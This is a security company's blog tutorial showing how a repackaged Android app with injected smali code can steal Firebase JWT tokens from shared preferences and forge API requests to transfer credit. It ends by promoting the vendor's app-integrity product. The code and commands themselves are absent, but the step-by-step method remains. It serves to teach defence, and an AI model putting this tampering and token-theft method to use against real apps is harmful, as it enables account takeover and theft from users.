Protecting Your API from App Impersonation: Token Hijacking Guide and Mitigation of JWT Theft
Last updated
Last updated
Company
General Terms and ConditionsGone are the days of locally-held data and standalone applications. With the rise of smartphones and portable devices, we are constantly on the go and reliant on network calls for everything from social communication to live updates. As a result, protecting backend servers and API calls has become more crucial than ever.
Most of the time, the application uses an API to make HTTP requests to the server. The server then responds with the given data. Most devs know and use it all the time. However, we often have data with restricted access — data only some users/entities can obtain. Moreover, they need to provide a way to prove who they are.
A typical method for authorizing requests (and therefore protecting data) is to use tokens signed by the server. The authentication request is sent to the server. If authentication is successful, the server issues a signed token and sends it back to the client. The application will use it on every request, so the server knows it is talking to an authorized entity. Although the token is used during its validity period (usually minutes), it is long enough to exploit the leaked token even manually.
The current standard is to carry these requests over HTTPS, which TLS protects. The whole process is encrypted, so it will not be useful to attackers even if they manage to catch a request. This ensures the confidentiality of communication — the attacker knows there is some communication but does not know its actual content.
Attackers can impersonate a legit application if they steal a token.
However, there is still an opportunity for a hacker to strike — a compromised client application crafted for token stealing. Attackers can impersonate a legit application after stealing a token. The server cannot tell whether the legit application, compromised application or some other tool (e.g. curl, Postman, …) is communicating with it. It just checks if the provided token is valid, fresh, and with proper scope (hint: a stolen token still is).
There are multiple ways that the app can be attacked and compromised in order to steal the token and use it for malicious purposes. Here are a few clear examples:
If an attacker gains access to a rooted device, they can misuse the token.
An attacker can create a tampered version of the app, distribute it, convince the user to install it, and then obtain a valid token from the tampered app to misuse it in an automated way.
Remote Code Execution and Escalation of Privilege vulnerabilities are discovered all the time; see https://source.android.com/docs/security/bulletin/asb-overview
For the purposes of this demonstration, we will be focusing on the second option.
The solution to these issues is to check clients’ integrity to ensure that:
A communicating party is a legit client — this blocks requests from other sources, such as Postman.
A communicating party can be trusted — the client’s integrity is intact (e.g. not tampered with), and it is running in a safe space (e.g. unrooted device).
Disclaimer: While we provide information on legitimate hacking techniques, we do not condone using this information for malicious purposes. Please only use this information for educational purposes.
The demonstration is presented on an Android platform; however, it is important to note that the iOS version is very similar in nature, and the same principles and considerations discussed stand the same.
Let’s have an imaginary company that provides meal tickets as cash credit in their app. The app uses Firebase Authentication to authenticate users. An operation to send credits from one person to another is handled by the Firebase cloud function. To identify which user is sending their credits, JWT ID Token is used. This token can be retrieved from the Firebase instance after the user is successfully authenticated.
Now for the hacking part — an overview of the attack.
First of all, we need to gain access to the application scope itself. There are several ways how this can be done. In most cases, rooting a device would give us the access we need. However, for our demonstration, we choose application repackaging.
App tampering is currently quite easy. Using proper tools (apktool), you can decompile, modify and repackage the application. One only needs to entice potential victims into downloading a seemingly authentic application.
Wait a minute. Where would an ordinary user get a tampered app?
Despite best efforts, shady apps can be found in the store. With the rise of alternative stores and sideloading, you will likely find even more malware. Real-world examples could also be apps that promise you to gain some advantage or free versions of apps that you typically need to pay for.
Do you remember Tom’s article about stealing and attacking APIs? If not, we recommend you give it a read, but in a nutshell — Firebase stores essential information in shared preferences. You can access and parse these data without any problem. And then misuse them in API calls.
Getting the format of API requests can be done by self-proxying. After that, you recycle this with a stolen token using Postman, curl, or other software.
To strike a balance between “too abstract” and “too complicated”, some implementation details will be omitted as a story for another time.
Initially, we acquire the valuable APK file of an application. This can be achieved in many ways. The technique described here uses adb — a standard tool which should be in the toolbelt of every developer.
After installation of the app, we need to get its package name. Using the terminal, we can list package names of all installed apps/services using the command:
This gives us a way shorter and cleaner list. Moreover, we found our wanted package name: com.mycompany.letseat
Now we need to get the path where the APK file is stored. This time, we use the shell functionality of adb.
This returns the path where APK is located. Using adb pull, we can extract this APK to our desired destination.
Now we finally have the APK, which we will tamper. In the next section, we will decompile it, modify it and repackage it.
In this part, we will mainly use apktool. Apktool is a handy tool for reverse engineering of Android APK files. You can download apktool in the provided link.
To decompile the APK, we will use the apktool d command. We are also going to set the output directory for better clarity.
The APK is extracted into the decompiled_apk folder and has a structure like this:
We recommend you to play around a bit and think of new ways to mess around with the application (e.g. you can see flutter assets there — you could inject ads using assets). What we care about for now is a folder named smali and its subfolders com/mycompany/letseat (what does that path remind you of?).
The smali folder contains decompiled code of the android part of the Flutter app. Let’s see MainActivity.smali for reference.
It looks like some broken version of C#. What is this smali thing anyway?
Smali code is an assembly language used in Dalvik VM — a custom Java VM for Android. What we did now is called baksmaling — getting smali code from Dalvik file (.dex). Apktool makes this “decompiling” for us, so we do not have to deal with .dex files. Smali code is primarily used in reverse engineering.
In the example above, you could make an educated guess — the init function is invoked, and this function belongs to the io/flutter/embedding/android package, and the function itself is in a file named V. Let’s try to verify this guess.
Path io/flutter/embedding/android exists, and there is a file named i.smali. It even contains multiple reference to the class’s constructor <init>().
However, something here is even more interesting. Look at some non-gibberish names: onCreate, onStart, onResume, onStop, onDestroy, … It looks like an Android activity lifecycle. We recommend you to check it out.
For now, all you need to know is that a lifecycle is a group of callbacks called when the app changes states (the app was launched, the app was put into the background, the device was rotated, …). We will choose onCreate as the place where we inject our code. However, this code has to be written in smali code. We have two options here:
Writing code directly in smali code (good luck with that)
Writing Kotlin/Java code, disassembling compiled code and copying that into the onCreate method
We are going to choose the second option. We are going to skip the creation and compilation of the APK. The most important part is the code itself:
In the onCreate method, we only call the steal() function. The stealing function then finds shared preferences, iterates through all files and logs their content (to keep this article concise, calls for the server are replaced by logging). Notice, that the first run (runs before first login/auth) will log “File not found”.
Now, we can build our application into APK and then decompile it. After decompilation, we will go to MainActivity.smali file and search for our steal() function. The smali code of steal() function looks like this:
What we need to do now is to merge two smali codes carefully.
Copy steal invocation from MainActivity.smali to i.smali
Insert steal function from MainActivity.smali to i.smali
Fix package references in i.smali
After examination, we can see that the steal() function invocation in the MainActivity.smali is translated as a one-liner.
However, it is invoked from the wrong package name. Since all related functions in the Let’s Eat app are in the i.smali file, we need to reference it. Let’s fix that.
Another surgical operation is copying the steal() function. After copying it, we need to update the package reference as well.
Notice this line. When we get the application information, we apply it to the current instance. Package reference is, therefore, MyApplication.
This would cause an error since you are referencing in non-existent package (in the “context” of the Let’s E`at app). However, you can use a reference to any android Activity. Therefore, you can rewrite this into the code below without any problems.
We successfully modified the code. Putting the project back into the APK is a straightforward process — using apktool, we do just that, and the apksigner will sign our package. Since there is no RASP protection to protect the app, the device will install it without any problem.
To rebuild the APK, we need to go one level above the decompiled APK (so we can refer to it by folder name). Then we use apktool.
A disadvantage of decompiling is that the signature used for signing is now gone. Because of that, we need to sign it by hand. An unsigned package is bad (and useless) because:
You cannot put it on the app store
You cannot install it properly (e.g. drag and drop the APK onto the emulator)
To sign an APK, you need a key. Since key generation is out of the scope of this article, we recommend you to go through the official Android developers guide.
For signing, you can use apksigner.
Now you have an APK containing malicious code which exposes JWT.
When we run the application, we can see the format of the stolen payload.
First, we will try to query the Firebase API itself. It is handy when an app has a public Firebase REST API.
We will need to grab Firebase project_id from the mobile app:
Second, notice key-value refresh_token and access_token from the Firebase file.
These can be easily misused with project_id. Since the endpoint is the same, we only need to provide valid values. Be aware that these tokens have limited validity, and you will need to get fresh ones quite often.
This request returns more data.
If you wonder where this project_id comes from, it is a google-services.json file which you can find in the Firebase console.
Getting the format of the request is possible. For Flutter, you could use reFlutter. A more general approach would be proxy. With a bit of time, you will get a format of the POST request in our example app:
Forging requests in our example is done by providing access_token to the header.
We successfully transferred stolen money.
We can protect against this impersonation by adding an additional security control implementing the zero trust security model — AppiCrypt. The zero trust assumes that all devices and applications cannot be trusted by default. Instead of relying on traditional security measures, zero trust employs a variety of security controls to authenticate and authorize devices and applications before granting access to protected resources. This aligns with the OWASP MAS requirements from MASVS-RESILIENCE and MASVS-AUTH control groups.
AppiCrypt makes protecting your backend API easy by employing the mobile app and device integrity state control, allowing only genuine API calls to communicate with remote services.
It generates a unique app cryptogram evaluated by a script on the backend side to detect and prevent threats like session hijacking (which we have just demonstrated), bot attacks or app impersonation.
The idea behind this technology is not just to protect APIs but to let your backend know that RASP controls were overcome or turned off by attackers. So gateway can easily block the session if the App integrity is compromised, and backends only process API calls if RASP controls check out.
Cryptogram is inserted into the header. There is no need to change the payload of the message itself.
Cryptogram itself is then an encrypted one-time value. You cannot modify it, and even if you manage to steal a payload containing a cryptogram, it is useless — a cryptogram cannot be simply reused. Nonce allows you to determine that the cryptogram belongs to your API call and isn’t replayed by an attacker. Using an old cryptogram will result in failure of its check (server will respond with code 403):
Where AppiCrypt excels is its integration. It does not require any integration with external APIs. It ensures low latency and does not introduce a single point of failure. The cryptogram is verified by locally running a simple script on your backend. AppiCrypt is a generic solution for all types of iOS and Android devices without dependency on Google Play or other OEM services.
You may have come across a similar technology Firebase AppCheck. We want to emphasize the significant difference between AppCheck and AppiCrypt. AppCheck is not applicable for every call but only during user enrollment. That means there remains space for token theft. It doesn’t prevent leakage but token issuance. We compared these technologies in the previous article.
You can find more details about AppiCrypt on our website.
In this article, we looked at one way of attacking a mobile application. We showed how Firebase tokens can be stolen from the app and used to attack the API. We also explained how an APK file could be decompiled, what smali code is and how to add malicious code. Finally, we learned how we could protect ourselves from this attack.
This article was focused on the Android platform, but a similar problem may occur on iOS or other mobile systems. From the user’s perspective, it is important to be careful when downloading and using applications from unverified sources and check their permissions and reviews. From the developer’s point of view, mobile security is a constantly evolving area that requires attention and updating of knowledge.
We hope this article helped you understand the risks associated with mobile security and taught you some ways to minimize them.
Written by Jaroslav Novotný — Flutter developer, Tomáš Soukal — Security Consultant and Tomáš Biloš — Backend developer